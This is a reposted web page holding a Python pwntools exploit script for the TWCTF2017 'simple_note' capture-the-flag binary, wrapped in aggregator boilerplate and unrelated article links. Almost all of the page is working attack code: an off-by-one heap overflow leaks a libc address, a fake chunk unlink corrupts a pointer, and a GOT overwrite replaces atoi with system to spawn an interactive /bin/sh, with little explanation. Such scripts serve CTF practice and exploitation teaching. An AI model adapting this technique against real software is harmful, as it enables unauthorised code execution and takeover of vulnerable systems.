python TWCTF2017 - simple_note

Posted 2021-05-09

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了python TWCTF2017 - simple_note相关的知识，希望对你有一定的参考价值。

from pwn import *

# =TEMPLATE FOR EXPLOITATION==================================
context(os='linux', arch='amd64')
BINARY = 'simple_note'
LIBC = '/lib/x86_64-linux-gnu/libc.so.6'
context.log_level = 'debug'
R_HOST = None
R_PORT = None
L_HOST = 'localhost'
L_PORT = 4444
elf    = ELF(BINARY)
libc = ELF(LIBC)
s      = None

if len(sys.argv) > 1 and sys.argv[1] == 'r':
    s = remote(R_HOST, R_PORT)
elif len(sys.argv) > 1 and sys.argv[1] == 'l':
    s = process([BINARY], env={'LD_PRELOAD': LIBC})
elif len(sys.argv) > 1 and sys.argv[1] == 'd':
    s = process([BINARY], env={'LD_PRELOAD': LIBC})
    f = open('gdbrc', 'r')
    time.sleep(0.5)
    pid = proc.pid_by_name(BINARY)
    gdb.attach(pid[0], f)
else:
    s = process([BINARY], env={'LD_PRELOAD': LIBC})

# =FUNCTIONS FOR EXPLOITATION=================================
def add(size, data):
    s.recvuntil('Your choice: \n')
    s.sendline('1')
    s.recvuntil('Please input the size: \n')
    s.sendline(str(size))
    s.recvuntil('Please input your note: \n')
    s.send(data)

def delete(idx):
    s.recvuntil('Your choice: \n')
    s.sendline('2')
    s.recvuntil('Please input the index: \n')
    s.sendline(str(idx))

def show(idx):
    s.recvuntil('Your choice: \n')
    s.sendline('3')
    s.recvuntil('Please input the index: \n')
    s.sendline(str(idx))
    s.readline()
    return s.readline()

def edit(idx, data):
    s.recvuntil('Your choice: \n')
    s.sendline('4')
    s.recvuntil('Please input the index: \n')
    s.sendline(str(idx))
    s.recvuntil('Please input your note: \n')
    s.sendline(data)

def system_calc(leaked_addr):
    offset_libc_base_to_leaked_addr = 0x3c4b78
    libc_base = leaked_addr - offset_libc_base_to_leaked_addr
    system = libc_base + libc.functions['system'].address
    return system

# =VARIABLES FOR EXPLOITATION=================================
chunk3_ptr = 0x6020d8

buf = ''
buf += p64(0)
buf += p64(0x80)
buf += p64(chunk3_ptr-8*3)
buf += p64(chunk3_ptr-8*2)
buf += 'A'*(0x88-len(buf)-8)
buf += p64(0x80)
buf += '\x90'

# =EXPLOITATION===============================================
add(0x88, 'a'*8)
add(0x88, 'a'*8)
add(0x88, 'a'*8)
add(0x88, 'A'*0x88) #fill for strlen off-by-one error
add(0x88, 'a'*8)

#information leak
delete(0)
add(0x88, 'a'*8)
leaked_addr = show(0)[:-1]
leaked_addr = u64(leaked_addr[8:].ljust(8, '\x00'))
system = system_calc(leaked_addr)

#create fake chunk
edit(3, buf)
delete(4)

#got overwrite
edit(3, p64(elf.got['atoi']))
edit(0, p64(system))

s.recvuntil('Your choice: \n')
s.sendline('/bin/sh')
s.recv()
s.interactive()

以上是关于python TWCTF2017 - simple_note的主要内容，如果未能解决你的问题，请参考以下文章

[TWCTF] superexpress

攻防世界 reverse 进阶 10 Reverse Box

Java simpe Mysql 查询

无法在 Python3、Ubuntu14.04 中使用 pip 安装 NumPy

在 isabelle 的证明中打印/显示证明方法的详细步骤（如 simp）

使用 simps/mqtt 调用阿里云的微消息队列 MQTT 版